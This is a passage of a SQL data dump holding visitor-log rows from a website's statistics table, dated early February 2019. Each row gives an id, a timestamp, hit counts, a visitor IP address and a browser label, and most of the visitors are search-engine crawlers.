,'207.46.13.183','other'),(381404,1549205514,1,1,0,0,'66.249.65.194','chrome'),(381405,1549205725,1,1,0,0,'54.36.148.183','other'),(381406,1549205981,1,1,0,0,'8.29.198.25','other'),(381407,1549206201,1,1,0,0,'54.36.148.118','other'),(381408,1549206515,1,1,0,0,'54.36.148.133','other'),(381409,1549206615,1,1,0,0,'54.36.149.30','other'),(381410,1549206763,2,2,0,0,'216.244.66.241','other'),(381411,1549206920,1,1,0,0,'54.36.148.68','other'),(381412,1549207331,1,1,0,0,'185.155.33.9','chrome'),(381413,1549207438,1,1,0,0,'54.36.149.58','other'),(381414,1549207762,1,1,0,0,'157.55.39.76','other'),(381415,1549208118,1,1,0,0,'8.29.198.25','other'),(381416,1549208405,1,1,0,0,'95.108.213.4','other'),(381417,1549208510,1,1,0,0,'54.36.148.118','other'),(381418,1549208750,1,1,0,0,'54.36.148.131','other'),(381419,1549209039,1,1,0,0,'66.249.65.198','chrome'),(381420,1549209290,1,1,0,0,'54.36.149.84','other'),(381421,1549209654,1,1,0,0,'46.229.168.136','other'),(381422,1549209733,1,1,0,0,'46.229.168.138','other'),(381423,1549209808,1,1,0,0,'54.36.148.58','other'),(381424,1549209969,1,1,0,0,'66.249.73.1','chrome'),(381425,1549209972,1,1,0,0,'66.249.65.196','chrome'),(381426,1549209995,1,1,0,0,'66.249.65.194','chrome'),(381427,1549210233,1,1,0,0,'66.249.65.198','chrome'),(381428,1549210243,1,1,0,0,'66.249.73.30','chrome'),(381429,1549211233,2,2,0,0,'66.249.65.194','chrome'),(381430,1549211449,1,1,0,0,'46.229.168.134','other'),(381431,1549211493,1,1,0,0,'54.36.148.236','other'),(381432,1549211991,1,1,0,0,'66.249.65.196','chrome'),(381433,1549212202,1,1,0,0,'216.244.66.241','other'),(381434,1549212552,1,1,0,0,'207.46.13.183','other'),(381435,1549212849,1,1,0,0,'66.249.65.194','chrome'),(381436,1549212955,1,1,0,0,'95.108.213.4','other'),(381437,1549213117,1,1,0,0,'66.249.73.31','chrome'),(381438,1549213215,2,2,0,0,'5.45.207.79','other'),(381439,1549213623,1,1,0,0,'54.36.148.237','other'),(381440,1549213810,1,1,0,0,'66.249.65.198','chrome'),(381441,1549213984,1,1,0,0,'54.36.149.60','other'),(381442,1549214256,1,1,0,0,'5.45.207.79','other'),(381443,1549214449,1,1,0,0,'54.36.149.12','other'),(381444,1549214450,1,1,0,0,'178.154.244.11','other'),(381445,1549214465,1,1,0,0,'141.8.142.103','other'),(381446,1549214511,2,2,0,0,'216.244.66.241','other'),(381447,1549214820,1,1,0,0,'207.46.13.7','other'),(381448,1549215063,1,1,0,0,'54.36.149.79','other'),(381449,1549215225,1,1,0,0,'54.36.149.73','other'),(381450,1549215268,1,1,0,0,'46.229.168.137','other'),(381451,1549215586,1,1,0,0,'54.36.148.25','other'),(381452,1549215824,1,1,0,0,'54.36.148.186','other'),(381453,1549216089,2,2,0,0,'66.249.65.198','chrome'),(381454,1549216219,1,1,0,0,'54.36.148.124','other'),(381455,1549216444,1,1,0,0,'188.165.254.17','firefox'),(381456,1549216833,1,1,0,0,'8.29.198.25','other'),(381457,1549216942,1,1,0,0,'54.36.148.223','other'),(381458,1549217074,1,1,0,0,'66.249.73.30','chrome'),(381459,1549217122,1,1,0,0,'66.249.65.196','chrome'),(381460,1549217373,1,1,0,0,'54.36.148.88','other'),(381461,1549217417,1,1,0,0,'54.36.148.198','other'),(381462,1549217742,1,1,0,0,'46.229.168.138','other'),(381463,1549217902,1,1,0,0,'54.36.148.176','other'),(381464,1549218028,1,1,0,0,'46.229.168.134','other'),(381465,1549218135,1,1,0,0,'66.249.73.31','chrome'),(381466,1549218959,1,1,0,0,'8.29.198.27','other'),(381467,1549219008,1,1,0,0,'46.229.168.133','other'),(381468,1549219061,1,1,0,0,'207.46.13.183','other'),(381469,1549219274,1,1,0,0,'66.249.73.31','chrome'),(381470,1549219291,1,1,0,0,'216.244.66.241','other'),(381471,1549219389,1,1,0,0,'66.249.73.1','chrome'),(381472,1549219397,1,1,0,0,'54.36.148.33','other'),(381473,1549219465,2,2,0,0,'66.249.65.194','chrome'),(381474,1549220103,1,1,0,0,'157.55.39.63','other'),(381475,1549220107,1,1,0,0,'54.36.148.14','other'),(381476,1549220126,1,1,0,0,'54.36.148.47','other'),(381477,1549220431,1,1,0,0,'54.36.148.143','other'),(381478,1549220542,1,1,0,0,'54.36.148.133','other'),(381479,1549220758,1,1,0,0,'54.36.149.73','other'),(381480,1549221043,1,1,0,0,'54.36.148.76','other'),(381481,1549221044,1,1,0,0,'46.229.168.144','other'),(381482,1549221099,1,1,0,0,'54.36.148.177','other'),(381483,1549221397,1,1,0,0,'54.36.148.236','other'),(381484,1549221400,1,1,0,0,'54.36.148.160','other'),(381485,1549221438,1,1,0,0,'66.249.65.194','chrome'),(381486,1549221521,1,1,0,0,'207.46.13.7','other'),(381487,1549222295,1,1,0,0,'5.188.210.53','chrome'),(381488,1549222316,1,1,0,0,'46.229.168.137','other'),(381489,1549222692,1,1,0,0,'54.36.149.31','other'),(381490,1549222786,1,1,0,0,'54.36.149.101','other'),(381491,1549222849,2,2,0,0,'216.244.66.241','other'),(381492,1549223173,1,1,0,0,'54.36.148.39','other'),(381493,1549223229,1,1,0,0,'66.249.65.196','chrome'),(381494,1549223487,1,1,0,0,'40.77.167.222','other'),(381495,1549223498,1,1,0,0,'176.113.170.104','firefox'),(381496,1549223931,1,1,0,0,'207.46.13.183','other'),(381497,1549224325,1,1,0,0,'46.229.168.130','other'),(381498,1549224535,1,1,0,0,'46.229.168.147','other'),(381499,1549224561,1,1,0,0,'64.246.165.180','firefox'),(381500,1549225105,1,1,0,0,'54.36.149.32','other'),(381501,1549225458,1,1,0,0,'54.36.148.20','other'),(381502,1549225698,1,1,0,0,'216.244.66.241','other'),(381503,1549225811,1,1,0,0,'66.249.65.196','chrome'),(381504,1549226114,1,1,0,0,'157.55.39.63','other'),(381505,1549226397,1,1,0,0,'46.229.168.140','other'),(381506,1549226468,1,1,0,0,'5.45.207.79','other'),(381507,1549226667,1,1,0,0,'54.36.148.242','other'),(381508,1549226920,1,1,0,0,'66.249.73.30','chrome'),(381509,1549226987,1,1,0,0,'157.55.39.60','other'),(381510,1549227106,1,1,0,0,'54.36.148.59','other'),(381511,1549227535,1,1,0,0,'54.36.149.24','other'),(381512,1549227677,1,1,0,0,'8.29.198.25','other'),(381513,1549228168,1,1,0,0,'54.36.148.221','other'),(381514,1549228369,1,1,0,0,'46.229.168.141','other'),(381515,1549228449,1,1,0,0,'216.244.66.241','other'),(381516,1549228601,1,1,0,0,'93.84.238.76','chrome'),(381517,1549229327,1,1,0,0,'54.36.148.150','other'),(381518,1549229387,1,1,0,0,'66.249.65.196','chrome'),(381519,1549229600,1,1,0,0,'54.36.149.52','other'),(381520,1549229663,1,1,0,0,'54.36.148.123','other'),(381521,1549229777,1,1,0,0,'54.36.148.239','other'),(381522,1549229794,1,1,0,0,'8.29.198.27','other'),(381523,1549230309,1,1,0,0,'66.249.65.196','chrome'),(381524,1549230435,1,1,0,0,'54.36.148.25','other'),(381525,1549230502,2,2,0,0,'66.249.65.194','chrome'),(381526,1549231017,1,1,0,0,'207.46.13.183','other'),(381527,1549231565,1,1,0,0,'66.249.65.198','chrome'),(381528,1549231683,1,1,0,0,'66.249.65.196','chrome'),(381529,1549231721,1,1,0,0,'46.229.168.132','other'),(381530,1549231723,1,1,0,0,'54.36.149.83','other'),(381531,1549231893,1,1,0,0,'46.229.168.136','other'),(381532,1549232022,2,2,0,0,'207.46.13.7','other'),(381533,1549232118,2,2,0,0,'66.249.65.194','chrome'),(381534,1549232636,1,1,0,0,'54.36.148.173','other'),(381535,1549232669,2,2,0,0,'66.249.65.196','chrome'),(381536,1549232781,1,1,0,0,'54.36.148.49','other'),(381537,1549232812,1,1,0,0,'66.249.73.31','chrome'),(381538,1549232917,1,1,0,0,'54.36.148.103','other'),(381539,1549233211,1,1,0,0,'54.36.149.4','other'),(381540,1549233442,1,1,0,0,'54.36.148.83','other'),(381541,1549233460,1,1,0,0,'54.36.148.96','other'),(381542,1549234008,1,1,0,0,'216.244.66.241','other'),(381543,1549234408,1,1,0,0,'207.46.13.183','other'),(381544,1549234443,1,1,0,0,'207.46.13.19','other'),(381545,1549234616,1,1,0,0,'31.184.238.34','chrome'),(381546,1549234667,1,1,0,0,'54.36.148.238','other'),(381547,1549234675,1,1,0,0,'54.36.149.60','other'),(381548,1549234866,1,1,0,0,'46.229.168.130','other'),(381549,1549234901,1,1,0,0,'54.36.148.140','other'),(381550,1549235263,1,1,0,0,'109.86.111.235','chrome'),(381551,1549235588,1,1,0,0,'54.36.148.237','other'),(381552,1549236038,3,3,0,0,'66.249.65.196','chrome'),(381553,1549236190,1,1,0,0,'54.36.148.162','other'),(381554,1549236337,1,1,0,0,'207.46.13.19','other'),(381555,1549236851,1,1,0,0,'66.249.65.194','chrome'),(381556,1549236951,1,1,0,0,'207.46.13.183','other'),(381557,1549237799,1,1,0,0,'54.36.148.239','other'),(381558,1549237817,2,2,0,0,'66.249.65.198','chrome'),(381559,1549238072,1,1,0,0,'54.36.148.244','other'),(381560,1549238402,1,1,0,0,'54.36.148.220','other'),(381561,1549238514,1,1,0,0,'8.29.198.25','other'),(381562,1549238573,1,1,0,0,'54.36.148.19','other'),(381563,1549238658,1,1,0,0,'66.249.65.194','chrome'),(381564,1549238667,1,1,0,0,'66.249.73.31','chrome'),(381565,1549238854,1,1,0,0,'46.229.168.146','other'),(381566,1549238884,2,2,0,0,'66.249.65.198','chrome'),(381567,1549238918,2,2,0,0,'66.249.65.196','chrome'),(381568,1549239250,1,1,0,0,'216.244.66.241','other'),(381569,1549239420,1,1,0,0,'54.36.148.82','other'),(381570,1549239888,1,1,0,0,'54.36.149.42','other'),(381571,1549240079,1,1,0,0,'178.154.244.11','other'),(381572,1549240288,1,1,0,0,'54.36.148.225','other'),(381573,1549240414,1,1,0,0,'54.36.149.17','other'),(381574,1549240639,1,1,0,0,'8.29.198.25','other'),(381575,1549241160,1,1,0,0,'54.36.148.104','other'),(381576,1549241358,2,2,0,0,'66.249.65.196','chrome'),(381577,1549241382,1,1,0,0,'54.36.148.45','other'),(381578,1549241396,1,1,0,0,'66.249.73.31','chrome'),(381579,1549241423,1,1,0,0,'46.229.168.133','other'),(381580,1549241477,1,1,0,0,'66.249.65.198','chrome'),(381581,1549241604,1,1,0,0,'194.44.247.218','chrome'),(381582,1549241646,1,1,0,0,'54.36.148.176','other'),(381583,1549241772,1,1,0,0,'54.36.148.94','other'),(381584,1549241920,2,2,0,0,'66.249.65.194','chrome'),(381585,1549242035,1,1,0,0,'54.36.148.190','other'),(381586,1549242167,1,1,0,0,'46.229.168.144','other'),(381587,1549242272,1,1,0,0,'66.249.65.196','chrome'),(381588,1549242303,1,1,0,0,'66.249.73.31','chrome'),(381589,1549242755,1,1,0,0,'37.115.191.132','chrome'),(381590,1549242832,1,1,0,0,'46.229.168.135','other'),(381591,1549243000,1,1,0,0,'54.36.148.213','other'),(381592,1549243018,1,1,0,0,'207.46.13.183','other'),(381593,1549243042,1,1,0,0,'54.36.149.45','other'),(381594,1549243676,1,1,0,0,'46.229.168.140','other'),(381595,1549244660,1,1,0,0,'66.249.65.196','chrome'),(381596,1549244947,1,1,0,0,'46.229.168.140','other'),(381597,1549245181,1,1,0,0,'40.77.167.153','other'),(381598,1549245514,1,1,0,0,'157.55.39.64','other'),(381599,1549245593,1,1,0,0,'207.46.13.36','other'),(381600,1549246392,1,1,0,0,'46.229.168.133','other'),(381601,1549246450,1,1,0,0,'207.46.13.183','other'),(381602,1549246640,1,1,0,0,'66.249.65.198','chrome'),(381603,1549246701,1,1,0,0,'46.229.168.151','other'),(381604,1549246871,1,1,0,0,'66.249.65.196','chrome'),(381605,1549247785,1,1,0,0,'66.249.73.30','chrome'),(381606,1549248320,1,1,0,0,'207.46.13.19','other'),(381607,1549248503,2,2,0,0,'66.249.65.196','chrome'),(381608,1549248564,1,1,0,0,'46.229.168.132','other'),(381609,1549248881,1,1,0,0,'207.46.13.183','other'),(381610,1549249356,1,1,0,0,'8.29.198.27','other'),(381611,1549249480,2,2,0,0,'34.215.179.53','chrome'),(381612,1549249766,1,1,0,0,'157.55.39.146','other'),(381613,1549249921,1,1,0,0,'46.229.168.141','other'),(381614,1549250635,1,1,0,0,'178.63.68.137','firefox'),(381615,1549250706,1,1,0,0,'5.45.207.79','other'),(381616,1549251452,1,1,0,0,'216.244.66.241','other'),(381617,1549251473,1,1,0,0,'8.29.198.26','other'),(381618,1549252714,1,1,0,0,'216.244.66.241','other'),(381619,1549252748,1,1,0,0,'54.36.148.65','other'),(381620,1549253416,1,1,0,0,'207.46.13.15','other'),(381621,1549254492,9,9,0,0,'176.9.146.84','other'),(381622,1549254791,1,1,0,0,'216.244.66.241','other'),(381623,1549254816,7,7,0,0,'85.10.199.185','other'),(381624,1549254889,1,1,0,0,'54.36.148.205','other'),(381625,1549255160,1,1,0,0,'54.36.149.82','other'),(381626,1549255290,1,1,0,0,'54.36.149.37','other'),(381627,1549255486,1,1,0,0,'54.36.149.38','other'),(381628,1549255524,1,1,0,0,'46.229.168.148','other'),(381629,1549255711,1,1,0,0,'54.36.148.145','other'),(381630,1549255758,1,1,0,0,'46.229.168.149','other'),(381631,1549255955,1,1,0,0,'54.36.149.51','other'),(381632,1549256093,1,1,0,0,'54.36.148.166','other'),(381633,1549256736,1,1,0,0,'180.76.15.24','other'),(381634,1549257181,2,2,0,0,'66.249.65.194','chrome'),(381635,1549257994,1,1,0,0,'54.36.148.176','other'),(381636,1549258049,1,1,0,0,'46.229.168.138','other'),(381637,1549258458,1,1,0,0,'216.244.66.241','other'),(381638,1549258559,1,1,0,0,'54.36.149.56','other'),(381639,1549258763,2,2,0,0,'66.249.65.198','chrome'),(381640,1549259068,1,1,0,0,'54.36.148.15','other'),(381641,1549259810,1,1,0,0,'54.36.148.52','other'),(381642,1549260209,1,1,0,0,'8.29.198.25','other'),(381643,1549260356,1,1,0,0,'66.249.65.194','chrome'),(381644,1549260544,2,2,0,0,'66.249.65.198','chrome'),(381645,1549260553,1,1,0,0,'157.55.39.156','other'),(381646,1549260679,1,1,0,0,'216.244.66.241','other'),(381647,1549260847,1,1,0,0,'178.175.143.157','other'),(381648,1549261132,1,1,0,0,'54.36.149.68','other'),(381649,1549261247,1,1,0,0,'66.249.73.30','chrome'),(381650,1549261451,2,2,0,0,'66.249.73.31','chrome'),(381651,1549261546,1,1,0,0,'54.36.149.101','other'),(381652,1549261753,1,1,0,0,'91.196.178.67','chrome'),(381653,1549261769,1,1,0,0,'66.249.65.198','chrome'),(381654,1549261786,1,1,0,0,'54.36.148.22','other'),(381655,1549261943,1,1,0,0,'46.229.168.145','other'),(381656,1549262037,1,1,0,0,'66.249.65.194','chrome'),(381657,1549262054,1,1,0,0,'54.36.148.19','other'),(381658,1549262299,1,1,0,0,'8.29.198.25','other'),(381659,1549262537,1,1,0,0,'46.229.168.143','other'),(381660,1549262772,1,1,0,0,'46.229.168.152','other'),(381661,1549262822,1,1,0,0,'54.36.148.165','other'),(381662,1549263034,1,1,0,0,'54.36.148.178','other'),(381663,1549263039,2,2,0,0,'66.249.65.194','chrome'),(381664,1549263098,1,1,0,0,'66.249.65.198','chrome'),(381665,1549263296,2,2,0,0,'66.249.73.1','chrome'),(381666,1549263363,2,2,0,0,'216.244.66.241','other'),(381667,1549264043,1,1,0,0,'66.249.65.196','chrome'),(381668,1549264057,1,1,0,0,'95.135.241.231','chrome'),(381669,1549264101,1,1,0,0,'66.249.65.198','chrome'),(381670,1549264402,1,1,0,0,'94.178.141.125','chrome'),(381671,1549264441,1,1,0,0,'66.249.65.194','chrome'),(381672,1549264513,1,1,0,0,'162.210.196.130','other'),(381673,1549265012,1,1,0,0,'54.36.148.140','other'),(381674,1549265260,1,1,0,0,'54.36.149.92','other'),(381675,1549265305,1,1,0,0,'91.196.178.93','chrome'),(381676,1549265518,1,1,0,0,'66.249.65.194','chrome'),(381677,1549265873,1,1,0,0,'54.36.149.73','other'),(381678,1549266325,1,1,0,0,'216.244.66.241','other'),(381679,1549266625,1,1,0,0,'54.36.148.172','other'),(381680,1549266711,1,1,0,0,'54.36.148.121','other'),(381681,1549267171,1,1,0,0,'54.36.148.26','other'),(381682,1549267270,1,1,0,0,'66.249.65.194','chrome'),(381683,1549267426,1,1,0,0,'54.36.149.12','other'),(381684,1549267632,1,1,0,0,'95.132.7.129','chrome'),(381685,1549267821,1,1,0,0,'46.201.174.228','firefox'),(381686,1549268260,1,1,0,0,'54.36.149.50','other'),(381687,1549268341,2,2,0,0,'66.249.65.194','chrome'),(381688,1549268420,1,1,0,0,'46.118.126.87','chrome'),(381689,1549268521,1,1,0,0,'46.229.168.144','other'),(381690,1549268566,1,1,0,0,'54.36.148.251','other'),(381691,1549268601,1,1,0,0,'66.249.65.198','chrome'),(381692,1549268687,1,1,0,0,'54.36.149.8','other'),(381693,1549268949,1,1,0,0,'46.229.168.138','other'),(381694,1549268975,1,1,0,0,'91.196.178.70','chrome'),(381695,1549269127,1,1,0,0,'54.36.149.10','other'),(381696,1549269135,1,1,0,0,'66.249.65.196','chrome'),(381697,1549269238,2,2,0,0,'157.55.39.158','other'),(381698,1549269306,1,1,0,0,'54.36.149.95','other'),(381699,1549269584,1,1,0,0,'178.93.103.41','chrome'),(381700,1549269599,1,1,0,0,'54.36.149.104','other'),(381701,1549269742,1,1,0,0,'66.249.65.198','chrome'),(381702,1549269750,1,1,0,0,'136.0.99.166','chrome'),(381703,1549270144,1,1,0,0,'95.132.7.129','chrome'),(381704,1549270223,1,1,0,0,'54.36.148.176','other'),(381705,1549270234,1,1,0,0,'54.36.148.198','other'),(381706,1549270290,1,1,0,0,'91.196.178.132','chrome'),(381707,1549270834,1,1,0,0,'54.36.149.104','other'),(381708,1549270895,2,2,0,0,'66.249.65.196','chrome'),(381709,1549270951,1,1,0,0,'54.36.148.212','other'),(381710,1549271059,1,1,0,0,'8.29.198.25','other'),(381711,1549271132,1,1,0,0,'157.55.39.10','other'),(381712,1549271310,1,1,0,0,'54.36.148.130','other'),(381713,1549271377,1,1,0,0,'54.36.148.209','other'),(381714,1549271550,2,2,0,0,'66.249.65.194','chrome'),(381715,1549272084,1,1,0,0,'66.249.65.196','chrome'),(381716,1549272106,1,1,0,0,'78.111.189.101','chrome'),(381717,1549272168,1,1,0,0,'46.229.168.147','other'),(381718,1549272246,1,1,0,0,'54.36.148.186','other'),(381719,1549272486,1,1,0,0,'66.249.65.198','chrome'),(381720,1549272659,1,1,0,0,'54.36.148.154','other'),(381721,1549272947,1,1,0,0,'173.212.242.197','other'),(381722,1549273130,1,1,0,0,'8.29.198.27','other'),(381723,1549273142,1,1,0,0,'66.249.73.31','chrome'),(381724,1549273396,1,1,0,0,'54.36.148.211','other'),(381725,1549273613,1,1,0,0,'46.229.168.144','other'),(381726,1549273654,2,2,0,0,'216.244.66.241','other'),(381727,1549273719,1,1,0,0,'46.211.25.246','chrome'),(381728,1549273865,1,1,0,0,'91.200.124.172','chrome'),(381729,1549274030,1,1,0,0,'66.249.73.30','chrome'),(381730,1549274082,1,1,0,0,'5.58.135.238','msie'),(381731,1549274227,1,1,0,0,'157.55.39.10','other'),(381732,1549274458,2,2,0,0,'46.229.168.134','other'),(381733,1549274620,2,2,0,0,'66.249.65.198','chrome'),(381734,1549274623,1,1,0,0,'46.229.168.143','other'),(381735,1549274872,1,1,0,0,'66.249.65.194','chrome'),(381736,1549275014,2,2,0,0,'91.196.178.93','chrome'),(381737,1549275839,1,1,0,0,'46.229.168.146','other'),(381738,1549276056,1,1,0,0,'54.36.148.102','other'),(381739,1549276171,1,1,0,0,'106.38.241.128','other'),(381740,1549276212,1,1,0,0,'66.249.65.194','chrome'),(381741,1549276272,1,1,0,0,'54.36.148.13','other'),(381742,1549276313,1,1,0,0,'46.229.168.137','other'),(381743,1549276517,1,1,0,0,'180.76.15.26','other'),(381744,1549276804,1,1,0,0,'54.36.149.2','other'),(381745,1549276846,1,1,0,0,'46.229.168.135','other'),(381746,1549276872,1,1,0,0,'66.249.65.198','chrome'),(381747,1549277012,1,1,0,0,'157.55.39.10','other'),(381748,1549277259,1,1,0,0,'54.36.148.56','other'),(381749,1549277424,1,1,0,0,'54.36.148.218','other'),(381750,1549277483,1,1,0,0,'40.77.167.20','other'),(381751,1549278354,2,2,0,0,'66.249.65.196','chrome'),(381752,1549278565,1,1,0,0,'54.36.149.87','other'),(381753,1549278958,1,1,0,0,'5.53.113.49','chrome'),(381754,1549279035,1,1,0,0,'54.36.148.24','other'),(381755,1549279054,1,1,0,0,'46.229.168.139','other'),(381756,1549279224,1,1,0,0,'54.36.149.3','other'),(381757,1549279296,1,1,0,0,'66.249.65.196','chrome'),(381758,1549279695,1,1,0,0,'54.36.148.11','other'),(381759,1549279707,1,1,0,0,'176.37.41.31','chrome'),(381760,1549280000,1,1,0,0,'157.55.39.10','other'),(381761,1549280121,1,1,0,0,'37.53.123.48','chrome'),(381762,1549280191,1,1,0,0,'46.229.168.137','other'),(381763,1549280370,1,1,0,0,'54.36.148.22','other'),(381764,1549280770,1,1,0,0,'66.249.65.194','chrome'),(381765,1549281116,1,1,0,0,'46.229.168.136','other'),(381766,1549281387,1,1,0,0,'136.0.99.166','chrome'),(381767,1549281540,1,1,0,0,'54.36.149.28','other'),(381768,1549281888,1,1,0,0,'66.249.65.194','chrome'),(381769,1549281906,1,1,0,0,'8.29.198.27','other'),(381770,1549281948,1,1,0,0,'128.72.0.2','msie'),(381771,1549282130,1,1,0,0,'46.229.168.138','other'),(381772,1549282161,1,1,0,0,'54.36.148.154','other'),(381773,1549282211,1,1,0,0,'216.244.66.241','other'),(381774,1549282216,2,2,0,0,'46.211.71.24','chrome'),(381775,1549282235,1,1,0,0,'46.229.168.129','other'),(381776,1549282368,1,1,0,0,'54.36.148.90','other'),(381777,1549282578,1,1,0,0,'66.249.73.5','chrome'),(381778,1549282971,1,1,0,0,'91.196.178.67','chrome'),(381779,1549283259,1,1,0,0,'66.249.65.198','chrome'),(381780,1549283306,2,2,0,0,'66.249.65.194','chrome'),(381781,1549283439,1,1,0,0,'54.36.149.52','other'),(381782,1549283618,1,1,0,0,'66.249.73.30','chrome'),(381783,1549283727,1,1,0,0,'46.229.168.136','other'),(381784,1549283957,1,1,0,0,'8.29.198.26','other'),(381785,1549284097,1,1,0,0,'54.36.148.250','other'),(381786,1549284287,1,1,0,0,'66.249.65.196','chrome'),(381787,1549284542,1,1,0,0,'46.229.168.148','other'),(381788,1549284839,1,1,0,0,'46.229.168.153','other'),(381789,1549285025,2,2,0,0,'46.229.168.151','other'),(381790,1549285049,1,1,0,0,'66.249.73.30','chrome'),(381791,1549285213,1,1,0,0,'54.36.148.190','other'),(381792,1549285644,1,1,0,0,'91.196.178.67','chrome'),(381793,1549285723,1,1,0,0,'66.249.65.196','chrome'),(381794,1549285787,2,2,0,0,'66.249.65.194','chrome'),(381795,1549285857,2,2,0,0,'91.196.178.100','chrome'),(381796,1549286177,1,1,0,0,'66.249.73.31','chrome'),(381797,1549286240,1,1,0,0,'54.36.149.83','other'),(381798,1549286281,1,1,0,0,'54.36.148.63','other'),(381799,1549286353,2,2,0,0,'66.249.65.198','chrome'),(381800,1549287055,1,1,0,0,'66.249.65.196','chrome'),(381801,1549287213,1,1,0,0,'66.249.73.31','chrome'),(381802,1549287605,1,1,0,0,'54.36.148.124','other'),(381803,1549287947,1,1,0,0,'54.36.148.28','other'),(381804,1549287972,2,2,0,0,'54.36.149.3','other'),(381805,1549288363,2,2,0,0,'66.249.65.196','chrome'),(381806,1549288473,1,1,0,0,'207.46.13.86','other'),(381807,1549288514,2,2,0,0,'66.249.65.198','chrome'),(381808,1549288587,1,1,0,0,'23.101.169.3','msie'),(381809,1549288788,1,1,0,0,'91.196.178.67','chrome'),(381810,1549288974,1,1,0,0,'54.36.148.68','other'),(381811,1549289033,1,1,0,0,'54.36.149.72','other'),(381812,1549289063,1,1,0,0,'82.207.49.150','firefox'),(381813,1549289460,1,1,0,0,'66.249.65.194','chrome'),(381814,1549289745,2,2,0,0,'66.249.65.196','chrome'),(381815,1549290117,1,1,0,0,'40.77.167.165','other'),(381816,1549290236,1,1,0,0,'141.8.142.103','other'),(381817,1549290438,1,1,0,0,'195.69.221.134','chrome'),(381818,1549290543,3,3,0,0,'66.249.65.194','chrome'),(381819,1549290788,1,1,0,0,'207.46.13.86','other'),(381820,1549290791,1,1,0,0,'66.249.65.198','chrome'),(381821,1549290860,1,1,0,0,'66.249.73.1','chrome'),(381822,1549291086,1,1,0,0,'46.229.168.151','other'),(381823,1549291199,1,1,0,0,'5.45.207.79','other'),(381824,1549291285,1,1,0,0,'66.249.65.196','chrome'),(381825,1549291618,1,1,0,0,'54.36.149.106','other'),(381826,1549291944,1,1,0,0,'54.36.149.33','other'),(381827,1549292195,1,1,0,0,'40.77.167.193','other'),(381828,1549292205,1,1,0,0,'5.45.207.79','other'),(381829,1549292514,3,3,0,0,'66.249.65.194','chrome'),(381830,1549292628,1,1,0,0,'40.117.171.104','other'),(381831,1549292767,1,1,0,0,'8.29.198.26','other'),(381832,1549292895,1,1,0,0,'54.36.148.177','other'),(381833,1549293038,1,1,0,0,'66.249.65.196','chrome'),(381834,1549293057,1,1,0,0,'93.170.117.69','firefox'),(381835,1549293116,1,1,0,0,'91.196.177.46','firefox'),(381836,1549293150,1,1,0,0,'54.36.149.11','other'),(381837,1549293200,2,2,0,0,'66.249.65.198','chrome'),(381838,1549293321,1,1,0,0,'216.244.66.241','other'),(381839,1549293385,1,1,0,0,'52.53.201.78','chrome'),(381840,1549293471,1,1,0,0,'54.36.149.31','other'),(381841,1549293673,1,1,0,0,'46.229.168.135','other'),(381842,1549293739,1,1,0,0,'54.36.148.133','other'),(381843,1549294138,1,1,0,0,'46.229.168.153','other'),(381844,1549294148,1,1,0,0,'5.45.207.19','other'),(381845,1549294367,1,1,0,0,'178.133.104.68','chrome'),(381846,1549294505,1,1,0,0,'54.36.148.198','other'),(381847,1549294796,1,1,0,0,'8.29.198.26','other'),(381848,1549294845,1,1,0,0,'54.36.148.39','other'),(381849,1549294879,1,1,0,0,'54.36.148.14','other'),(381850,1549294985,1,1,0,0,'54.36.148.60','other'),(381851,1549295007,1,1,0,0,'54.36.148.153','other'),(381852,1549295062,1,1,0,0,'141.8.142.103','other'),(381853,1549295341,1,1,0,0,'213.108.41.211','chrome'),(381854,1549295633,3,3,0,0,'216.244.66.241','other'),(381855,1549296092,1,1,0,0,'54.36.149.72','other'),(381856,1549296163,1,1,0,0,'54.36.149.105','other'),(381857,1549296233,1,1,0,0,'54.36.148.226','other'),(381858,1549296250,1,1,0,0,'54.36.149.98','other'),(381859,1549296367,1,1,0,0,'54.36.148.166','other'),(381860,1549296455,1,1,0,0,'5.188.210.53','chrome'),(381861,1549296621,1,1,0,0,'66.249.65.196','chrome'),(381862,1549296709,1,1,0,0,'213.108.41.211','chrome'),(381863,1549296719,1,1,0,0,'54.36.148.34','other'),(381864,1549296768,1,1,0,0,'54.36.148.18','other'),(381865,1549297023,1,1,0,0,'54.36.148.165','other'),(381866,1549297257,1,1,0,0,'66.249.65.194','chrome'),(381867,1549297322,1,1,0,0,'54.36.148.228','other'),(381868,1549297567,1,1,0,0,'54.36.149.59','other'),(381869,1549297732,1,1,0,0,'91.196.178.134','chrome'),(381870,1549298038,2,2,0,0,'66.249.65.196','chrome'),(381871,1549298039,1,1,0,0,'46.229.168.139','other'),(381872,1549298074,1,1,0,0,'216.244.66.241','other'),(381873,1549298123,2,2,0,0,'66.249.65.198','chrome'),(381874,1549298134,1,1,0,0,'195.69.221.42','chrome'),(381875,1549298138,1,1,0,0,'40.77.167.165','other'),(381876,1549298442,1,1,0,0,'66.249.73.31','chrome'),(381877,1549298543,1,1,0,0,'54.36.148.225','other'),(381878,1549299103,1,1,0,0,'54.36.148.188','other'),(381879,1549299131,1,1,0,0,'23.101.169.3','msie'),(381880,1549299301,1,1,0,0,'40.77.167.165','other'),(381881,1549299596,1,1,0,0,'66.249.66.44','chrome'),(381882,1549299624,1,1,0,0,'54.36.148.155','other'),(381883,1549299723,3,3,0,0,'66.249.66.156','chrome'),(381884,1549299767,2,2,0,0,'66.249.66.154','chrome'),(381885,1549299858,4,4,0,0,'66.249.66.152','chrome'),(381886,1549299924,1,1,0,0,'54.36.148.146','other'),(381887,1549300181,1,1,0,0,'207.46.13.197','other'),(381888,1549300427,1,1,0,0,'207.46.13.86','other'),(381889,1549300672,1,1,0,0,'66.249.66.154','chrome'),(381890,1549300830,1,1,0,0,'46.211.133.213','chrome'),(381891,1549301180,1,1,0,0,'54.36.149.75','other'),(381892,1549301199,1,1,0,0,'212.26.135.178','chrome'),(381893,1549301342,1,1,0,0,'66.249.66.156','chrome'),(381894,1549301620,2,2,0,0,'216.244.66.241','other'),(381895,1549301680,1,1,0,0,'54.36.148.77','other'),(381896,1549301799,1,1,0,0,'54.36.148.195','other'),(381897,1549302072,1,1,0,0,'23.101.169.3','msie'),(381898,1549302251,1,1,0,0,'46.229.168.130','other'),(381899,1549302306,1,1,0,0,'54.36.148.94','other'),(381900,1549303235,1,1,0,0,'54.36.148.236','other'),(381901,1549303249,1,1,0,0,'91.209.11.236','other'),(381902,1549303260,3,3,0,0,'157.55.39.251','other'),(381903,1549303611,1,1,0,0,'66.249.66.40','chrome'),(381904,1549303619,1,1,0,0,'8.29.198.25','other'),(381905,1549303685,2,2,0,0,'66.249.66.154','chrome'),(381906,1549303768,1,1,0,0,'54.36.149.25','other'),(381907,1549303836,1,1,0,0,'5.45.207.19','other'),(381908,1549303907,1,1,0,0,'54.36.148.28','other')